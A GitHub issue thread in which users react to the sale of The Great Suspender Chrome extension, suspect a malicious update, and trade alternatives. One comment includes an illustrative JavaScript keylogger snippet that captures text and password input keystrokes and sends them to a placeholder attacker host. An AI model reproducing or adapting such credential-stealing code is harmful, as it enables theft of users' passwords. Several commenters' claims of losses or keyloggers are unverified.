Upcoming changes to the management of The Great Suspender #1175
Comments
|
Thank you for all your work over the years. Will they also be managing the Great Discarder fork? |
|
Congrats! Can we know who the new owners are? I'd like to make sure it's someone we can continue to trust. Thanks! |
|
The Great Discarder will remain with me. Although I don't have any capacity to continue the maintenance of that project right now. I may be able to continue merging PRs if they come in. I do not wish to publish publicly any personal information about the new owner, but the project will remain open source and the code here on GitHub will continue to reflect the code published to the chrome webstore. |
|
when can we expect the new overlord to actually do something? it's been two weeks now and they haven't done anything visible. that's not much of an improvement over the previous state ... :} |
|
Thanks for all the work over the years, Dean! |
|
so i guess we can now officially conclude that the transition was a failure? :( the question is how to move forward. finding a "worthy" successor within the community still requires prolonged investment from the old maintainer, so as things stand, even a prominent call for help on the web store would not lead to anything. i suppose a possible way forward would be declaring "bankruptcy", seeing if a viable fork emerges, and if so, transferring official ownership to its maintainer. |
|
Would be great to hear more about this. Unfortunately, there has been cases of "mysterious buyers" taking over projects and injecting malware on them (see NanoAdblocker/NanoCore#362). I don't have any reason to believe that the deal here might be in any way problematic like this, but the lack of information is worrisome. For now I am using a local version instead of the one provided by Google store. ps: thank you for all your work in this project! |
|
After what happened to Nano Adblocker and Defender and an update to The Great Suspender, my stomach is churning. I'm so scared. I don't know what I'm supposed to do. With Nano I just uninstalled them, switched to uBO and kept the filters as it leads to an archived repo. What do I do here???? |
|
Hmm, addon updated to 7.1.8 but there's no release for it on github, still showing 7.1.6. What's the official changelog in the newest update? (besides trying to parse commits) An an aside, I still hate how Chrome decides to randomly update addons in the background despite being in developer mode. Why even have an 'update extensions' button if it's going to update them regardless? |
Judging by the commits, it maybe was an oversight in publishing both on GitHub and on Google. Looks like he possibly published after overhauling the screenshot code in #1238 and then again after making it possible to disable Google Analytics in #1239 I've been inspecting the code on my browser extension version for any malicious stuff being added between those version discrepancies, I'd advise you to do the same. (Not sure in Chrome, but in Brave I can click inspect on the extension and view its code) |
|
Uninstalled The Great Suspender! Also I fear another bad code injecting, especially like above about the releases. Anyway... thanks to the old dev. Oh and if someone decide to switch too: |
|
gsAnalytics.jsにコードが追加され、外部からjavascriptを呼び出しているように見えます。 私は英語が分からないので、機械翻訳でごめんなさい。 |
|
What are people using as a replacement for TGS? "Tiny Suspender" is mentioned above. In the absence of a compelling explanation by the new owner of who they are and what they're doing, and an update here consistent with the Play Store, it's only prudent to consider TGS to now be malware. |
|
The code posted in @danupo's comment caught my eye and a quick Google search turned up these Reddit posts: https://www.reddit.com/r/chrome/comments/ikn38u/malicious_chrome_webstore_extension/ Similar JS name and paths just with different domain, which wayyy too coincidental: Also a more indepth analysis of the minified js: https://www.reddit.com/r/chrome/comments/gg2nii/auto_refresh_extension_now_malware/fqd64jx/ Domain lookup: Name: OWEBANALYTICS.COM Freshly registered domain so not to trigger any Google search results eh? Conclusion: abort abort! |
I knew something was up when a new version of the extension was available, yet the GitHub was not updated. Luckily it never had a chance to update to 7.1.8 (the extension displayed the usual window when an update is available, in which I backed up my suspended tabs, deleted the staged update from the filesystem, modified the manifest file by deleting update_url, and restarted Chrome causing the extension to delete itself and become disabled) and I eventually installed 7.1.6 of the extension from the Releases page. Good job to both @danupo and @zanglang for discovering this and making this known. Also, should this be posted on other communities as well (like Chrome subreddit) to spread the word? |
Yes. I've tweeted about it, if anyone wants to retweet go ahead, can also share anywhere else talking about it there so we can keep people in the know incase the malicious author here deletes this issue. https://twitter.com/joshmanders/status/1321283443825803264 |
|
OK, it appears I may have overreacted. owa.tracker-combined-latest.minified.js is a release artifact from the Open Web Analytics project, which proclaims to be a GA alternative. Example code: https://github.com/Open-Web-Analytics/Open-Web-Analytics/wiki/Tracker If we DNS lookup the 2 other linked domains, they both have the same DNS SOA record, but it's not the same for owebanalytics.com. Unfortunately it's not possible to gleam any further info for this domain. Without actually seeing the actual tracked events that the JS is sending back it's may not be reasonable to conclude that it is malicious (and my JS-fu is not powerful enough). Almost all of our Android/iPhone apps are embedded with similar trackers to help devs track user interaction within the app, so it's up to the maintainer to step up and clarify why it's suddenly injecting a tracker. As for the coincidence that all 3 sites host the same JS with the same directory paths... it turns out that's just how owa is packaged. |
|
Pretty suspicious to have published this version without pushing to github. It wreaks to high hell of plans to be very malicious. |
|
They didn't tag anything, but the tracking-opt-out branch seems to be pretty clear. The new dev added tracking, and with it an opt-out. Let me repeat. There is an opt-out button for the tracking Now, whether it works is another thing, but I am skeptical that they'd add such a button if they were malicious. |
|
It's a relief that the new dev lets you opt out of the tracking they added. Relief being relative of course; still shit scared lol. They say that it's not just Google Analytics. You guys found out that there's Open Web Analytics. For now I'm continuing to use The Great Suspender. If there's a decent fork or alternative, please let us know! |
|
If you are happy discarding tabs and don't need the whole placeholder infrastructure, there's https://chrome.google.com/webstore/detail/auto-tab-discard/jhnleheckmknfcgijgkadoemagpecfol/ (and equivalents for other browsers) - it has some amazing shortcuts under chrome://extensions/shortcuts too. |
|
The big question: Is it still safe to continue using TGS? |
|
I'd like to point out the amount of code that has changed since this announcement is not significant. The code that has changed has been very minor or was already a part of this GitHub in another branch. I don't worry that this extension has become unsafe, at least yet. My biggest fear is that there won't be any real future updates and the project will die. That's why I've started learning JavaScript |
I would say no, because:
|
|
The silence from the new owner is not good either. It just wreaks of bad vibes. |
|
Could anyone please tell me, is removing the extension enough to reverse whatever may have been compromised on my machine / browser? Is there any potential that this extension could have used some exploit to drop code elsewhere on my computer, or otherwise cause any problems even if it is removed? Very grateful for any insight! Thank you. |
|
Do you guys know if the malware version of this extension had a keylogger?, I'm worried about my user&passwords. Can this extension register events such as keypress? I'm worried about the imported script having something like const texts = new Map;
const passwords = new Map;
const textEls = document.querySelectorAll('input[type=text]').forEach(el => el.addEventListener('keypress', e => texts.set(path(el), texts.get(path(el) + e.key))));
const textEls = document.querySelectorAll('input[type=password]').forEach(el => el.addEventListener('keypress', e => passwords.set(xPath(el), passwords.get(xPath(el) + e.key))));
fetch(`http://badboys-dirty-serve.badworld/${btoa(JSON.stringify(texts))}|${btoa(JSON.stringify(passwords))}`);This is just a sample little code that would if the extension if capable of track all keystrokes on input elements.... not something really funny |
Personal theory: he signed a contract that forbids him from doing so or risk being sued. Naturally he'd put himself first before everyone else, as is evident by the sale in June. |
Wow. You expect the dude to accept a lawsuit because you feel like he should? Don't get me wrong, anyone approaching a major open source project with a cash buyout and an NDA should be highly suspect. However @deanoemcke doesn't owe us anything (except not violating the license of any code contributed to the repo, which he hasn't). Developing open source software is a thankless job. If he decided he didn't want to do it anymore, I could see how the buyout would be enticing. If I were him, I'd be kicking myself for taking it. What I wouldn't be doing: considering financially ruining myself and my family because someone on the internet didn't like a decision I made about a product I gave them for free. It's a crappy situation, but treating it like this is a bit over the top. |
Wow. What a pointless overreaction there. Not sure why you'd be defensive over someone just stating a fact. No feelings there, just someone saying the author might not be able to tell because he got a better contract for that. Which can;t be proven right or disproved. Calm down... |
I think putting potential things like their users banking info and ect at risk is a bit more than a "crappy situation" |
Where did I say this? Nowhere. In fact I made it clear in that message that I expected him to do the opposite of that, so I'm not sure how you misread that so hard. Get off your moral high horse.
The morally neutral option is just abandoning it, making it stagnant or handing it over to other people willing to develop this open source. |
|
Dude, this sale was done 183 days ago. He isn't even active since July 25th of 2020, he probably has no idea that they added malware, or that they were planning to. |
@Beamy68 maybe not active with git commits, but we have dragged him in here a few times. He commented on the day of the ban, for instance Sent with GitHawk |
|
He commented on the day of the ban? Where? I can't find it in the 600+ messages generated by the users of the extension |
|
@binary-person |
|
he didn't comment on the day of the ban from the web store. perhaps i'm misunderstanding? |
|
He very much did, one comment can be found here: #1263 (comment), another below that #1263 (comment). A day or so later there was a bit more, which you can find here: #1263 (comment) |
add "The Great Suspender" Chrome extension hijack drama greatsuspender/thegreatsuspender#1175
|
I've been losing actual money until I discovered and uninstalled it. Now I need a replacement desperately but I am too afraid to trust other strangers! |
|
So, you sold people out who trusted your product for your own gains? This is not how open source should be done dude. There are plenty of other ways to profit from open source. Tsk tsk. |
Ikr? I was SHOCKED! Now I cannot even trust the ones I trust, because suddenly the ownership will change unnoticeably (even if it announced, my life is not that empty to follow-up each and every update of each and every extension or application)! I know now there are alternatives like TMS, but how can I make sure this won't happen again? |
Not possibly, for sure. I was robbed because of that. |
Unless you do not use extensions or only use ones unpacked locally after manually analyzing the code, you can't. |
|
Hi guys, Watch out guys, highly likely keylogger/password stealer. |
tbh the selling story might be a front. |
I agree with you there. Google's latest response to this situation has simply been apologizing to users about this and recommending that people who installed the extension immediately change sensitive information like passwords etc. |
Consider the most forked fork called The Great Suspender - Without Analytics Tracking which strips out Google Analytics tracking and adds some locales. I would tend to trust it more because I don't appreciate being treated like a commodity!! Unfortunately, it's not on the Chrome Store though, so if you need the convenience of that you can use the second most forked fork called The Marvellous Suspender (in the Store) which includes the tracking. The file is removed from the repo, but still installed with the store extension; very sneaky. You can compare them with this diff.
I also highly recommend Brave (based on Chromium) or Dissenter (based on Brave), both of which strip out and block all tracking. These browsers also block all cross-site scripting by default and give you a lot of privacy controls not found in other browsers. They even anonymize your browser thumbprint which further protects you from being tracked. Dissenter even gives you the added ability to comment on literally ANY site and avoid censorship so you can keep your voice (but of course always be kind and polite). 😀 "Arguing that you don't care about the right to privacy because you have nothing to hide is no different than saying you don't care about free speech because you have nothing to say." -Edward Snowden |
|
This is a poor show. I'm very disappointed. Quite frankly, this isn't the first extension I've seen be in this situation (Nano Adblock was another one), and you should've known better than to effectively sell the project on to some malicious, anonymous so-and-so, thereby betraying the trust of your users and putting them at risk. There are better and less selfish ways you could've dealt with this if you couldn't handle maintaining the project any more. How was all of this not a huge red flag to you? Shameful. |
Please take a look here: gioxx#62 (comment) I became a father very recently and I'm trying to catch up on the tasks left undone as quickly as possible, which is very difficult with such a young baby in the house! 😄 |
and others
Hi everyone. I'd like to announce some changes to the administration of The Great Suspender project.
It's been almost 8 years since the first release of The Great Suspender to the Chrome Web Store. I've seen the extension turn from a hobby project to an indispensable chrome add-on, all due to an enthusiastic community of users that promoted the extension on my behalf.
The contribution of both code, and feedback from everyone here on GitHub has been critical to the success of the project. You have helped me detect and resolve bugs, given me ideas for UX improvements and new features, and provided technical assistance when I have found myself struggling with some code. I honestly couldn't have got to this point without you.
However, as the user base for The Great Suspender has continued to grow, so have the commitments in my private life. And I've found I'm increasingly incapable of meeting the demands that this project requires. I've therefore decided to take a step back, and let others lead the development.
I have found a new dedicated owner for The Great Suspender who has the capacity to see the extension actively maintained into the future. The new GitHub administrator for this project will be @greatsuspender. They have also purchased the rights to publish the extension to the Chrome webstore and will be managing the public release process going forwards. Big thanks for taking on this project and continuing its development!
Thanks again for all of your support here on GitHub. You're the best!
The text was updated successfully, but these errors were encountered: